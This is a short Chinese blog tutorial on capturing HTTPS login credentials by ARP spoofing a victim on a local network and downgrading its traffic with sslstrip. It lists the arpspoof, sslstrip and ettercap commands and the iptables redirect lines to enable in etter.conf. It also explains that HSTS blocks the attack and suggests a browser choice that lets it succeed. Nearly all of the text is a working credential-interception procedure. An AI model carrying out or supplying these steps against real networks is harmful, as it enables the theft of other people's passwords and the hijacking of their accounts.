arp欺骗获取https网站的登录信息

这里要利用sslstrip插件进行网址转换:https-->http

Sslstrip -a -f -k

-a:该接口所有的流量

-f:强制转化

-k:忽略证书不安全的提示

修改文件配置使得流量通过sslstrip插件

Vim /etc/ettercap/etter.conf

编辑这个文件

1   redir_command_on = "iptables -t nat -A PREROUTING -i %iface -p tcp -d %destination --dport %port -j REDIRECT --to-port %rport"

2   redir_command_off = "iptables -t nat -D PREROUTING -i %iface -p tcp -d %destination --dport %port -j REDIRECT --to-port %rport"

3   redir6_command_on = "ip6tables -t nat -A PREROUTING -i %iface -p tcp -d %destination --dport %port -j REDIRECT --to-port %rport"

4   redir6_command_off = "ip6tables -t nat -D PREROUTING -i %iface -p tcp -d %destination --dport %port -j REDIRECT --to-port %rport"

把(Linux下面的)这四条语句的注释取消,确保流量通过sslstrip插件

%iface:接口类型,如eth0

%destination:目标的ip地址

%port:目标的流量端口

%rport:指定的流量端口

redir_command_on:打开流量重定向,将接口收到的目标ip发向目标端口的流量全部重定向到指定端口

redir_command_off:关闭重定向

Cat /etc/ettercap/etter.conf

arp欺骗获取https网站的登录信息_第1张图片

开始实操(测试网址)

登录实验吧

Arpspoof -i eth0 -t 192.168.232.128 192.168.232.2

Sslstrip -a -f -k

Ettercap -Tq -i eth0

该网址最好用goole打开,IE自带HSTS检测,不允许以http的形式访问https网站

HSTS:http严格传输安全机制,不允许不安全的证书访问,对于拥有HSTS的网站,访问成功后的后续操作不支持http请求,http请求会自动转为https请求,如果在操作过程中检测到了不安全的证书或者无法以https请求打开网页,则会自动断开连接,拒绝一切不安全的连接

这会导致一些网站无法尝试成功

arp欺骗获取https网站的登录信息_第2张图片

arp欺骗获取https网站的登录信息_第3张图片

arp欺骗获取https网站的登录信息_第4张图片

arp欺骗获取https网站的登录信息_第5张图片

arp欺骗获取https网站的登录信息_第6张图片

你可能感兴趣的:(https,网络协议,http)